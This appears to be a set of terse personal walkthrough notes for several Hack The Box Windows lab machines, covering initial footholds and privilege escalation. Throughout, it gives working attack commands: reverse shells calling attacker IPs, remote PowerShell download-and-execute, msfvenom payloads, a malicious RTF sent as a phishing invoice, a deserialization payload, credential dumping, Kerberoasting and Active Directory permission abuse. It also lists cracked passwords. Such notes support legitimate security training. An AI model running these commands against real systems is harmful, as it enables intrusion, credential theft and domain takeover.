Hash : $krb5tgs$23$*UNKNOWN$UNKNOWN$MSSQLSvc/object.local:1433*$DAECA7C0ACC55F14934E5E8A382F7AD6$FB41B91C34D8B1139FD30A93B7C0534D7767606C940A162D6A08BD7A84C604FC6757E2EFB5CCEAC9B6B87052440E82F0A111663EE2E9153746E5C13296E39D2788BE41F4 81F2F2594F3D90011C2BDEFFC704613ACA9B3684A9F96B352E6DD0B0B0009C294DA4E8203AA43C0221F3263115899E7B77989CEF394E9402AA96BF768D515210FCEA3D4FFA7134D8F3B2D0C867C2C63B20164C01D78A607B5249A79CAAA334AF80BD5B0D21DA948440BF0E0BB68E4AE791 8DDAF8C860AC86EA7C21E95F29ACB53397C9F5F24A223ACEE9DCE22E255CEF0D7CB67E0F421A50D1F204ACC038D85D15716B33F0EB2B23E7A039ECAA67F4EA9327860970AD417406941EB771DB2B564096336524650D6C0D6EB1CA6BF108C339DDB9FA38DB0587F7EFBAEE98A3FE3449DB 4DA81E59224EA0467B4DC2F2576846DDEF787E3D7BA1C213D3248B7D5D5227E00E8CA6B480227CD69DDFD7ACC05FD2F907DA6B5BABF60D630BA12679323E02E541FF81B2522A8536BE1F534640AF12C1EADE7026859C82366915C64D45BB855432BD7E72EC1AA53B91D7A6D24E609694C2 5EA1D37AA66E5E92BE8BF9F6D1DC5E728E70F2295CDBBB2AA7651F2C2615D0ED861D8763F86F9FD5A5F5FB814F0914BC5A2185FD42A753905E28ABDA1DBD891F006C4217D412C1ACBF524B752D395C2055B6814526DF022A600A949779A98D61F80B774425F5D3D28D07F00863D71E5495 6F68353AA2102681E6931AF8CC09F18E20F3DEBABEE639F578850D0B6D9BD4FCE3CD0DA084AAA4A1805C0E4F012FEB64BB5AB86C748FAD3DDB2ED466C4FCB075C24C2C0B56A728BB65ADBE0F2013B45C79D9C515E3F418B7B7DBCE8B34AF370427670AB12EF1A6B67CFF93B07FD21B9A61 3D0BA3E034ACA27D2AB139F648A8AA1DAA3F3FD66EA26021855B55ADB32273B3C7D241BAFBE4E12A5F30AF5AB2EF8C4A141A41D27D567C9AFE0A1D2DB17E0BA357E13064D94E077F849D6E66ADD66F4015BE57C9FBF99E79C68ED18DC1F5916044F7ECF984F8397CF65C69776D8E432F4F 498B323AF1963081EE28C561BBF305D6FA9593813D3A9EFC24671C9540DE1CB7006FBB36847A987EFBDD754517BEE81D8322DC5F2C529C610591D1DE053D72F79A29506725C90C9369FB285A8C2D30090A403C6906FE0C61F3E31C397A3B03768B1061C3B7E69CFDA329F4CB3EA8286A66 1EC9CFF04C29F9BBC311AC53776C265C9DFEEDB85C4ECD5DC0DDEE64C87E9045A7632A792861B687F6358E138D11676BBFD2783D644B24837659B6F96F93AF529AFC43C32943583E4593B9BEA76B6778134C55B1EB3101CE390F3E9A494BDC927BA5FF2EF20720012FCF4270A8B1BFFA2A 1012D7C4CACB77AE9B8DE19C8671CB09DB0F15FA008658D9669553F3C5AB3C303694D23A0F409F72DF95336F9ED8898A66289FC15AAF0B9DF0432D69FAA156BF54BBEF237DFCF0139850C5C8896C65A6DA6A4A9712A6D21F2A883EF6F25D460E
Failed(try_change_pass)
*Evil-WinRM* PS C:\programdata> $newpass = ConvertTo-SecureString '0xdf0xdf!' -AsPlainText -Force
*Evil-WinRM* PS C:\programdata> Set-DomainUserPassword -Identity maria -AccountPassword $newpass
Success(write Logon_Script)
*Evil-WinRM* PS C:\programdata> echo "whoami /all > \programdata\cmd.out" > cmd.ps1
*Evil-WinRM* PS C:\programdata> Set-DomainObject -Identity maria -SET @{scriptpath="c:\\programdata\\cmd.ps1"}
*Evil-WinRM* PS C:\programdata> type \programdata\cmd.out
*Evil-WinRM* PS C:\programdata> echo "dir /s \users\maria\ > \programdata\out" > cmd.ps1
found \users\maria\desktop\Engines.xls
*Evil-WinRM* PS C:\programdata> echo "copy \users\maria\desktop\Engines.xls \programdata\" > cmd.ps1
Engines.xls has 3 maria passwords, `crackmapexec winrm 10.10.11.132 -u maria -p maria-pass` got maria:W3llcr4ft3d_4cls
`evil-winrm -i 10.10.11.132 -u maria -p 'W3llcr4ft3d_4cls'`
Privilege_escalation(maria->DomainAdmin)
*Evil-WinRM* PS C:\programdata> Set-DomainObjectOwner -Identity 'Domain Admins' -OwnerIdentity 'maria'
*Evil-WinRM* PS C:\programdata> Add-DomainGroupMember -Identity 'Domain Admins' -Members 'maria'
*Evil-WinRM* PS C:\programdata> net user maria
need to exit the session an relogin with evil-winrm
*Evil-WinRM* PS C:\programdata> net user maria
maria is in 'Domain Admin'

Initial_Foothold
https://github.com/SafeBreach-Labs/SirepRAT
`pip install -r requirements.txt --default-timeout=1000`
`python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args ' /c powershell Invoke-WebRequest -outfile c:\programdata\nc.exe -uri http://10.10.14.18/nc64.exe'`
`python3 SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\programdata\nc.exe" --args ' -e cmd 10.10.14.18 9001'`
get cred method 1
kali start smbserver `smbserver.py share . -smb2support`
`reg save HKLM\SAM .\sam` `reg save HKLM\SYSTEM .\system`
`copy .\sam \\10.10.14.18\share\sam`
Failed(file too big): `copy .\system \\10.10.14.18\share\system`
`nc -nvlp 9002 > system` watch the file size till it's not growing, because nc won't tell when the transfer complete
`nc.exe 10.10.14.18 9002 < .\system`
`secretsdump.py -system system -sam sam local` got hashes, crack got app:mesh5143
get cred method 2
there is a script constantly resetting 'Administrator' localgroup, so do it fast
kali# chisel_1.7.6_linux_amd64 server -p 8000 --reverse
target# chisel.exe client 10.10.14.18:8000 R:445:localhost:445
`net user fakeadmin passw0rd! /add`
`net localgroup administrators /add fakeadmin` same time on target
`secretsdump.py 'fakeadmin:passw0rd!@127.0.0.1'` same time on kali
get cred method 3
PS C:\program files\windowspowershell\modules\packagemanagement> gci -force
found the hidden batch file 'r.bat' which does the reset administrator and app
it has both cred app:mesh5143 administrator:_1nt3rn37ofTh1nGz
another way to find the r.bat: `wmic process GET Name,ProcessID,CommandLine,ExecutablePath /FORMAT:LIST`
decrypt user.txt
app:mesh5143 login to HTTP 8080 got a webshell as app, we can use nc to get a reverse shell as app
PS C:\Data\Users\app> (Import-CliXml -Path user.txt).GetNetworkCredential().Password
this way will show the real user flag
decrypt root.txt
C:\Data\Users\app\hardening.txt show the hints: - changed default administrator password of "p@ssw0rd" - added firewall rules to restrict unnecessary services - removed administrator account from "Ssh Users" group
C:\Data\Users\app\iot-admin.xml which is another powershell cred file
PS C:\Data\Users\app> $cred = Import-CliXml -Path iot-admin.xml
PS C:\Data\Users\app> $cred.GetNetworkCredential() | fl
we got the cred administrator:_1nt3rn37ofTh1nGz and login HTTP 8080 then use nc to get a reverse shell as administrator
PS C:\data\users\administrator> (Import-CliXml -Path root.txt).GetNetworkCredential() | fl
this way will show the real root flag

Initial_Foothold
Rejetto HttpFileServer 2.3.x - Remote Command Execution (3) https://www.exploit-db.com/exploits/49125
powershell.exe location based on arch and session: https://ss64.com/nt/syntax-64bit.html
`python3 49125.py 10.10.10.8 80 "c:\windows\SysNative\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.12/Invoke-PowerShellTcp.ps1')"`
`python3 49125.py 10.10.10.8 80 "C:\Users\kostas\Desktop\nc.exe -e cmd.exe 10.10.14.12 9001"`
Privilege_escalation(kostas->system)
`windows-exploit-suggester.py -d 2023-09-04-mssb.xls -i systeminfo.txt` found MS16-032 and winpeas also found 'https://www.exploit-db.com/download/39719' in 'IE history'
`IEX (new-object net.webclient).downloadstring("http://10.10.14.12/39719.ps1")`
`Invoke-MS16-032 -command "C:\Users\kostas\Desktop\nc.exe -e cmd.exe 10.10.14.12 9002"`

Initial_Foothold
ftp anonymous login found 'AppLocker.docx' 'readme.txt' 'Windows Event Forwarding.docx'
readme.txt got hint: "please email me any rtf format procedures - I’ll review and convert."
`exiftool Windows\ Event\ Forwarding.docx` found 'Creator : nico@megabank.com'
`msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=443 -f hta-psh -o 443.hta`
`git clone https://github.com/bhdresh/CVE-2017-0199`
`python2 CVE-2017-0199/cve-2017-0199_toolkit.py -M gen -w 443.rtf -u http://10.10.14.2/443.hta -x 0`
`sendEmail -f 0xdf@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a 443.rtf -s 10.10.10.77 -v`
OR use msf exploit/windows/fileformat/office_word_hta
`sendEmail -f 0xdf@megabank.com -t nico@megabank.com -u "Invoice Attached" -m "You are overdue payment" -a /root/.msf4/local/invoice.doc -s 10.10.10.77 -v`
Privilege_escalation(nico->tom)
found powershell cred file C:\Users\nico\Desktop\cred.xml
`powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"`
output Tom:1ts-mag1c!!! which we can ssh into target
Privilege_escalation(tom->claire)
C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors\acls.csv open and analize OR upload it to bloodhound
OR `bloodhound-python -u Tom -p '1ts-mag1c!!!' -d HTB.LOCAL -c all -dc 10.10.10.77 --zip`
Both Failed(upload fail, bloodhound-python timeout) so have to manual analize with 'acls.csv'
'tom' has 'WriteOwner' over 'claire' which has 'WriteDacl' over 'Backup_Admins' group
PS C:\Users\tom\Desktop\AD Audit\BloodHound> . .\PowerView.ps1
PS C:\users\tom\desktop\AD Audit\BloodHound> Set-DomainObjectOwner -identity claire -OwnerIdentity tom
PS C:\users\tom\desktop\AD Audit\BloodHound> Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
PS C:\users\tom\desktop\AD Audit\BloodHound> $cred = ConvertTo-SecureString "qwer1234QWER!@#$" -AsPlainText -force
PS C:\users\tom\desktop\AD Audit\BloodHound> Set-DomainUserPassword -identity claire -accountpassword $cred
`ssh claire@10.10.10.77` with 'qwer1234QWER!@#$'
Privilege_escalation(claire->Backup_Admins)
claire@REEL C:\Users\claire>net group backup_admins claire /add
claire@REEL C:\Users\Administrator>net group backup_admins
verify 'claire' does in the group
Privilege_escalation(Backup_Admins->Administrator)
C:\Users\Administrator\Desktop\Backup Scripts\BackupScript.ps1 found cred 'Cr4ckMeIfYouC4n!' and comment '# admin password'
`ssh administrator@10.10.10.77` with 'Cr4ckMeIfYouC4n'

Initial_Foothold
found '2049/tcp open nfs'
`showmount -e 10.10.10.180` shows '/site_backups (everyone)'
`mount -t nfs 10.10.10.180:/site_backups /mnt/` OR `mount --types nfs --target /mnt/ 10.10.10.180:/site_backups`
`strings /mnt/App_Data/Umbraco.sdf | head` found 'admin@htb.local' hash: b8be16afba8c314ad33d812f22a04991b90e2aaa and crack got 'baconandcheese'
gobuster and the /mnt both found /umbraco
login with admin@htb.local:baconandcheese
Umbraco CMS 7.12.4 - Remote Code Execution (Authenticated) https://www.exploit-db.com/exploits/49488
`python3 49488.py -i http://10.10.10.180 -u "admin@htb.local" -p baconandcheese -c whoami`
`python3 49488.py -i http://10.10.10.180 -u "admin@htb.local" -p baconandcheese -c whoami -a " /all"`
`python3 49488.py -i http://10.10.10.180 -u "admin@htb.local" -p baconandcheese -c powershell.exe -a " IEX (new-object net.webclient).downloadstring('http://10.10.14.12/Invoke-PowerShellTcp.ps1')"`
Privilege_escalation(iis apppool\defaultapppool->administrator)
PS> `cd HKLM:\software\WOW6432Node\TeamViewer` and `dir` OR `get-itemproperty -path .` found 'SecurityPasswordAES : {255, 155, 28, 115...}'
PS HKLM:\software\WOW6432Node\TeamViewer\Version7> (get-itemproperty -path .).SecurityPasswordAES
We can use 0xdf's decrypt script: https://0xdf.gitlab.io/2020/09/05/htb-remote.html#decrypt-password
`python3 0xdf_AES128CBC_decode.py` [+] Found password: !R3m0te!
OR follow ippsec got a meterpreter session in msf and use windows/gather/credentials/teamviewer_passwords
msf6 post(windows/gather/credentials/teamviewer_passwords) > set session 8
msf6 post(windows/gather/credentials/teamviewer_passwords) > run
[*] Finding TeamViewer Passwords on REMOTE
[+] Found Unattended Password: !R3m0te!
`psexec.py administrator@10.10.10.180` with !R3m0te!

Initial_Foothold
`rpcclient -U "" -N 10.10.10.169` `enumdomusers` save usernames
`querydispinfo` found cred marko:Welcome123!
`crackmapexec winrm 10.10.10.169 -u rpc_users.txt -p 'Welcome123!'` found melanie:Welcome123!
`evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'`
Privilege_escalation(melanie–>ryan)
C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt found cred ryan:Serv3r4Admin4cc123!
`evil-winrm -i 10.10.10.169 -P 5985 -u ryan -p 'Serv3r4Admin4cc123!'`
note: 'ryan' is not in 'Remote Management Users' but in 'Contractors' which is a nest group of 'Remote Management Users'
Privilege_escalation(ryan–>SYSTEM)
'ryan' is in 'MEGABANK\DnsAdmins' https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-groups#dnsadmins
"The default permissions are Allow: Read, Write, Create All Child objects, Delete Child objects, Special Permissions."
https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/privileged-groups-and-token-privileges#dnsadmins
`msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=443 -f dll -o rev.dll`
`smbserver.py s .`
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll \\10.10.14.11\s\rev.dll
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute stop dns
*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe \\resolute start dns
`rlwrap nc -lnvp 443` and we got a system shell

Initial_Foothold
nmap found 'EGOTISTICAL-BANK.LOCAL' smb anonymous login but no share
`kerbrute userenum -d EGOTISTICAL-BANK.LOCAL /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt --dc 10.10.10.175` found username format 'fsmith' point to 'Fergus Smith' in /about.html page, save all usernames
`GetNPUsers.py 'EGOTISTICAL-BANK.LOCAL/' -usersfile users.txt -format hashcat -outputfile hashes.aspreroast -dc-ip 10.10.10.175`
`hashcat -m 18200 hashes.aspreroast /usr/share/wordlists/rockyou.txt --force` got cred fsmith:Thestrokes23
`evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes23`
Privilege_escalation(fsmith–>svc_loanmgr)
winpeas found autologin cred EGOTISTICALBANK\svc_loanmanager:Moneymakestheworldgoround!
manually discover the cred: *Evil-WinRM* PS HKLM:\software\microsoft\windows nt\currentversion\winlogon> get-item -path .
`evil-winrm -i 10.10.10.175 -u svc_loanmgr -p 'Moneymakestheworldgoround!'`
Privilege_escalation(svc_loanmgr–>administrator)
`bloodhound-python -u svc_loanmgr -p 'Moneymakestheworldgoround!' -ns 10.10.10.175 -d EGOTISTICAL-BANK.LOCAL -c all --zip`
'svc_loanmgr' has 1 'First Degree Object Control' which include 'GetChanges' and 'GetChangesAll' over 'EGOTISTICAL-BANK.LOCAL' domain
`secretsdump.py 'svc_loanmgr:Moneymakestheworldgoround!@10.10.10.175'` got administrator's NT hash
`wmiexec.py -hashes 'aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e' -dc-ip 10.10.10.175 administrator@10.10.10.175`
OR `evil-winrm -i 10.10.10.175 -u administrator -H 823452073d75b9d1cf70ebdf86c7f98e`

Initial_Foothold
enum website, /supportrequest.html found username 'ksimpson' in a cmd screenshot, /passwords.html says about "reset your password to be the same as the username"
`smbclient.py -k scrm.local/ksimpson:ksimpson@dc1.scrm.local -dc-ip dc1.scrm.local` `help` `shares` `use public` `get Network Security Changes.pdf`
'Network Security Changes.pdf' says "NTLM is disabled" "now everything is done via Kerberos" "SQL database has had access removed from the HR department"
Failed: `GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-ip dc1.scrm.local -request -k -debug`
note: if NTLM is disabled, GetUserSPNs.py need_to_fix https://github.com/fortra/impacket/issues/1206
Use the -dc-ip option but specify the fully qualified domain name of a DC rather than the IP, line 260 : use 'target = self.__kdcHost' instead of 'target = self.getMachineName()'
`GetUserSPNs.py scrm.local/ksimpson:ksimpson -dc-host dc1.scrm.local -request -k`
`hashcat mssqlsvc-hash /usr/share/wordlists/rockyou.txt` got cred sqlsvc:Pegasus60
generate NTLM hash: `iconv -f ASCII -t UTF-16LE <(printf "Pegasus60") | openssl dgst -md4` b999a16500b87d17ec7f2e2a68778f05
get SSL/TLS certificate: `openssl s_client -connect dc1.scrm.local:636` save as 'ldapserver.pem'
edit 'TLS_CACERT' in '/etc/ldap/ldap.conf' point to the full path of 'ldapserver.pem'
dump all users: `ldapsearch -h dc1.scrm.local -Z -D ksimpson@scrm.local -w ksimpson -b "DC=scrm,DC=local" "(objectClass=user)"` objectSid:: AQUAAAAAAAUVAAAAhQSCo0F98mxA04uX9AEAAA==
get SID: `getPac.py -targetUser administrator scrm.local/ksimpson:ksimpson` OR use 0xdf's sid.py script and the SID_string from ldapsearch SID: S-1-5-21-2743207045-1827831105-2542523200
get sliver ticket: `ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -dc-ip dc1.scrm.local -spn MSSQLSvc/dc1.scrm.local:1433 administrator` [*] Saving ticket in administrator.ccache
note: On Linux, Kerberos looks in predefined places for tickets, like /tmp/krb5cc_[uid of current user] and any file pointed to by the KRB5CCACHE environment variable
`cp administrator.ccache /tmp/krb5cc_0` OR `export KRB5CCNAME=administrator.ccache` and verify in the end with `klist`
`mssqlclient.py -k dc1.scrm.local` `select name, database_id from sys.databases;` `SELECT TABLE_NAME FROM ScrambleHR.INFORMATION_SCHEMA.TABLES;`
`SELECT * from ScrambleHR.dbo.UserImport;` got cred MiscSvc:ScrambledEggs9900 scrm.local
/etc/krb5.conf:
[libdefaults]
default_realm = SCRM.LOCAL
[realms]
SCRM.LOCAL = {
kdc = dc1.scrm.local
admin_server = dc1.scrm.local
}
note: we can not use `evil-winrm` because NTLM is disabled, but we can use `pwsh`
`sudo pwsh` `update-help` `Install-Module -Name PSWSMan -Scope AllUsers` Yes_to_All `Install-WSMan` `exit`
restart pwsh `sudo pwsh` `Enter-PSSession dc1.scrm.local -Credential MiscSvc` enter password: ScrambledEggs9900
get a proper shell `iwr 10.10.14.6/nc64.exe -outfile nc64.exe` `rlwrap -cAr nc -lnvp 443`
Privilege_escalation 1(MiscSvc->system)
......the process of identify the .NET object deserialization and exploit it is way out of my exp, but I'll sum it a up down here
'C:\shares\IT\Apps\Sales Order Client\' found and download 'ScrambleClient.exe' and 'ScrambleLib.dll'
run it on windows, follow webpage steps to connect target, (need to edit C:\Windows\System32\drivers\etc\hosts just like /etc/hosts)
after login the app, “Tools” > “Enable Debug Logging” and update a new order to trigger traffic, we can find 'ScrambleDebugLog.txt' in the same directory as the exe(also can use wireshark)
analize the log found 'Deserialization', analize ScrambleClient.exe with dnSpy.exe on windows
.NET object deserialization https://github.com/pwntester/ysoserial.net
PS > .\ysoserial.exe -f BinaryFormatter -g AxHostState -o base64 -c "C:\\programdata\\nc64.exe 10.10.14.6 444 -e cmd.exe"
`nc 10.10.11.168 4411`, set listener and send the payload beload to get system shell
UPLOAD_ORDER;AAEAAAD/////AQAAAAAAAAAMAgAAAFdTeXN0ZW0uV2luZG93cy5Gb3JtcywgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODkFAQAAACFTeXN0ZW0uV2luZG93cy5Gb3Jtcy5BeEhvc3QrU3RhdGUBAAAAEVByb3BlcnR5QmFnQmluYXJ5BwICAAAACQMAAAAPAwAAAL8DAAACAAEAAAD/////AQAAAAAAAAAMAgAAAF5NaWNyb3NvZnQuUG93ZXJTaGVsbC5FZGl0b3IsIFZlcnNpb249My4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0zMWJmMzg1NmFkMzY0ZTM1BQEAAABCTWljcm9zb2Z0LlZpc3VhbFN0dWRpby5UZXh0LkZvcm1hdHRpbmcuVGV4dEZvcm1hdHRpbmdSdW5Qcm9wZXJ0aWVzAQAAAA9Gb3JlZ3JvdW5kQnJ1c2gBAgAAAAYDAAAA4QU8P3htbCB2ZXJzaW9uPSIxLjAiIGVuY29kaW5nPSJ1dGYtOCI/Pg0KPE9iamVjdERhdGFQcm92aWRlciBNZXRob2ROYW1lPSJTdGFydCIgSXNJbml0aWFsTG9hZEVuYWJsZWQ9IkZhbHNlIiB4bWxucz0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwvcHJlc2VudGF0aW9uIiB4bWxuczpzZD0iY2xyLW5hbWVzcGFjZTpTeXN0ZW0uRGlhZ25vc3RpY3M7YXNzZW1ibHk9U3lzdGVtIiB4bWxuczp4PSJodHRwOi8vc2NoZW1hcy5taWNyb3NvZnQuY29tL3dpbmZ4LzIwMDYveGFtbCI+DQogIDxPYmplY3REYXRhUHJvdmlkZXIuT2JqZWN0SW5zdGFuY2U+DQogICAgPHNkOlByb2Nlc3M+DQogICAgICA8c2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgICAgIDxzZDpQcm9jZXNzU3RhcnRJbmZvIEFyZ3VtZW50cz0iL2MgQzpcXHByb2dyYW1kYXRhXFxuYzY0LmV4ZSAxMC4xMC4xNC42IDQ0NCAtZSBjbWQuZXhlIiBTdGFuZGFyZEVycm9yRW5jb2Rpbmc9Int4Ok51bGx9IiBTdGFuZGFyZE91dHB1dEVuY29kaW5nPSJ7eDpOdWxsfSIgVXNlck5hbWU9IiIgUGFzc3dvcmQ9Int4Ok51bGx9IiBEb21haW49IiIgTG9hZFVzZXJQcm9maWxlPSJGYWxzZSIgRmlsZU5hbWU9ImNtZCIgLz4NCiAgICAgIDwvc2Q6UHJvY2Vzcy5TdGFydEluZm8+DQogICAgPC9zZDpQcm9jZXNzPg0KICA8L09iamVjdERhdGFQcm92aWRlci5PYmplY3RJbnN0YW5jZT4NCjwvT2JqZWN0RGF0YVByb3ZpZGVyPgsL
Privilege_escalation 2(MiscSvc->system)
fix sql xp_cmdshell first
SQL> EXECUTE sp_configure 'show advanced options', 1
SQL> RECONFIGURE
SQL> EXECUTE sp_configure 'xp_cmdshell', 1
SQL> RECONFIGURE
SQL> xp_cmdshell whoami /all
'SeImpersonatePrivilege Enabled'
SQL> xp_cmdshell powershell curl 10.10.14.6/nc64.exe -outfile C:\\programdata\\nc64.exe
SQL> xp_cmdshell powershell curl 10.10.14.6/rev.bat -outfile C:\\programdata\\rev.bat
rev.bat content: C:\\programdata\\nc64.exe -e cmd 10.10.14.6 443
SQL> xp_cmdshell powershell curl 10.10.14.6/JuicyPotatoNG.exe -outfile C:\\programdata\\jp.exe
RoguePotato also works
`rlwrap -cAr nc -lvnp 443`
SQL> xp_cmdshell C:\\programdata\\jp.exe -t * -p C:\\programdata\\rev.bat
and we got system shell
Unintended File Read Via MSSQL
SQL> SELECT BulkColumn FROM OPENROWSET(BULK 'C:\users\administrator\desktop\root.txt', SINGLE_CLOB) MyFile

Initial_Foothold
TLS certs found 'research.search.htb' and page img zoom found "Send password to Hope Sharp" "IsolationIsKey?"
create userlist file hope.txt and fill with 'hope sharp h.sharp hope.s hope.sharp hopesharp' one per line
`crackmapexec smb 10.10.11.129 -u hope.txt -p IsolationIsKey? --continue-on-success` found hope.sharp:IsolationIsKey?
`smbmap -u hope.sharp -p IsolationIsKey? -R -H 10.10.11.129 --no-banner` /RedirectedFolders$ got a lot usernames as folder
`ldapsearch -h 10.10.11.129 -x -s base namingcontexts` `ldapsearch -h 10.10.11.129 -x -b "DC=search,DC=htb"`
`ldapsearch -h 10.10.11.129 -D 'hope.sharp@search.htb' -w "IsolationIsKey?" -b "DC=search,DC=htb"`
my kali can't run -h `ldapsearch -H ldap://10.10.11.129 -x -D 'hope.sharp@search.htb' -w "IsolationIsKey?" -b "DC=search,DC=htb" > ldapsearch.txt`
`ldapdomaindump -u search.htb\\hope.sharp -p 'IsolationIsKey?' 10.10.11.129 -o ldap/` output html, looks good
`bloodhound-python -u hope.sharp -p IsolationIsKey? -d search.htb -c All -ns 10.10.11.129 --zip`
in bloodhound, "List all Kerberoastable Accounts" shows WEB_SVC and KRBTGT
`GetUserSPNs.py -request -dc-ip 10.10.11.129 search.htb/hope.sharp -outputfile web_svc.hash` enter password: IsolationIsKey?
`hashcat web_svc.hash /usr/share/wordlists/rockyou.txt` got cred web_svc:@3ONEmillionbaby but it does not really help
`cat bloodhound/20230906054646_users_multi_lines.json | jq -r '.data[].Properties.samaccountname' > users.txt`
`crackmapexec smb 10.10.11.129 -u users.txt -p passwords.txt --continue-on-success` found Edgar.Jacobs:@3ONEmillionbaby
`smbmap -u edgar.jacobs -p '@3ONEmillionbaby' -H 10.10.11.129 -s helpdesk -R` found \edgar.jacobs\Desktop\Phishing_Attempt.xlsx
`smbclient //10.10.11.129/RedirectedFolders$ '@3ONEmillionbaby' -U edgar.jacobs` smb: \edgar.jacobs\> get Desktop\Phishing_Attempt.xlsx
in xlsx file, there is a C column which is hidden
0xdf: https://yodalearning.com/tutorials/unprotect-excel/
ippsec: http://www.excelsupersite.com/how-to-remove-an-excel-spreadsheet-password-in-6-easy-steps/
follow the steps in webpage, mkdir and `unzip Phishing_Attempt.xlsx` `sed -i 's/<sheetProtection[^>]*>//' xl/worksheets/sheet2.xml` `zip -fr Phishing_Attempt.xlsx *`
open again, we can see C column is password, save the users and passwords into files
`crackmapexec smb 10.10.11.129 -u Phishing_Attempt_users.txt -p Phishing_Attempt_passwords.txt --no-bruteforce --continue-on-success` found Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18
`smbclient //10.10.11.129/RedirectedFolders$ '$$49=wide=STRAIGHT=jordan=28$$18' -U sierra.frye`
smb: \> get sierra.frye\Desktop\user.txt
Privilege_escalation()
smb: \sierra.frye\Downloads\Backups\> get search-RESEARCH-CA.p12
smb: \sierra.frye\Downloads\Backups\> get staff.pfx
try to import into browser but it need password.
`/usr/share/john/pfx2john.py search-RESEARCH-CA.p12 > search-RESEARCH-CA.p12.hash` `john --wordlist=/usr/share/wordlists/rockyou.txt search-RESEARCH-CA.p12.hash` got cred: misspissy
`/usr/share/john/pfx2john.py staff.pfx > staff.pfx.hash` `john --wordlist=/usr/share/wordlists/rockyou.txt staff.pfx.hash` got cred: misspissy
gobuster dir https://search.htb found /staff is 403, but after import certs, it is a 'windows powershell web access'
login with Sierra.Frye:$$49=wide=STRAIGHT=jordan=28$$18 computer_name: research
in bloodhound, "Shortest Paths to Domain Admins from Owned Principles"
user 'Sierra.Frye' is in 'BIRMINGHAM-ITSEC' group, which is in 'ITSEC' group, which has 'ReadGMSAPassword' over user 'BIR-ADFS-GMSA', which has 'GenericAll' over user 'Tristan.Davies', which is in 'Domain Admins' group
I have not tried this: https://github.com/rvazarkar/GMSAPasswordReader
0xdf & ippsec both use this: https://www.dsinternals.com/en/retrieving-cleartext-gmsa-passwords-from-active-directory/
PS C:\Users\Sierra.Frye\Documents> $gmsa = Get-ADServiceAccount -Identity 'BIR-ADFS-GMSA' -Properties 'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> $mp = $gmsa.'msDS-ManagedPassword'
PS C:\Users\Sierra.Frye\Documents> ConvertFrom-ADManagedPasswordBlob $mp
"CurrentPassword field looks like gibberish, but that’s the point of having a GMSA"
PS C:\Users\Sierra.Frye\Documents> (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
check if it works, then store it in $password also $SecPass
PS C:\Users\Sierra.Frye\Documents> $password = (ConvertFrom-ADManagedPasswordBlob $mp).CurrentPassword
PS C:\Users\Sierra.Frye\Documents> $SecPass = (ConvertFrom-ADManagedPasswordBlob $mp).SecureCurrentPassword
with the 'BIR-ADFS-GMSA' cred store in $SecPass, we can overwrite 'Tristan.Davies' password
PS C:\Users\Sierra.Frye\Documents> $cred = New-Object System.Management.Automation.PSCredential BIR-ADFS-GMSA, $SecPass
PS C:\Users\Sierra.Frye\Documents> Invoke-Command -ComputerName 127.0.0.1 -ScriptBlock {Set-ADAccountPassword -Identity tristan.davies -reset -NewPassword (ConvertTo-SecureString -AsPlainText '0xdf0xdf!!!' -force)} -Credential $cred
`wmiexec.py 'search/tristan.davies:0xdf0xdf!!!@10.10.11.129'` now `whoami /all` we have 'domain admins' group membership

Initial_Foothold
tcp/80 register and login
found /change_pass.php accept GET request and don't need old pass
found /contact.php leak username tyler, and if submit a URL of kali_python_server, it got hit, which means the user(script) clicked the link
XSRF(Cross-Site Request Forgery) aka “one-click attack” and “session riding” but it is easily defeated by including POST parameters such as a token in the form that generates the request which would not be replicated in the link passed to the target.
use burp to intercept our /change_pass.php GET request and submit: http://10.10.10.97/change_pass.php?password=password&confirm_password=password&submit=submit
now we can login as tyler:password OR just register as [' or 1='1]
after login as tyler or [' or 1='1] we found: \secnotes.htb\new-site tyler / 92g!mA8BGjOirkL%OG*&
`smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' //10.10.10.97/new-site` found iisstart.htm which seems to be the webroot of 8808/tcp
`put /opt/shells/php/cmd.php 0xdf.php` `put /opt/shells/netcat/nc.exe nc.exe`
`curl "http://10.10.10.97:8808/0xdf.php?cmd=nc.exe+-e+cmd.exe+10.10.14.15+443"`
Privilege_escalation(tyler->administrator)
found C:\Users\tyler\Desktop\bash.lnk which prove there is a bash.exe
`where /R c:\ bash.exe` output: c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe
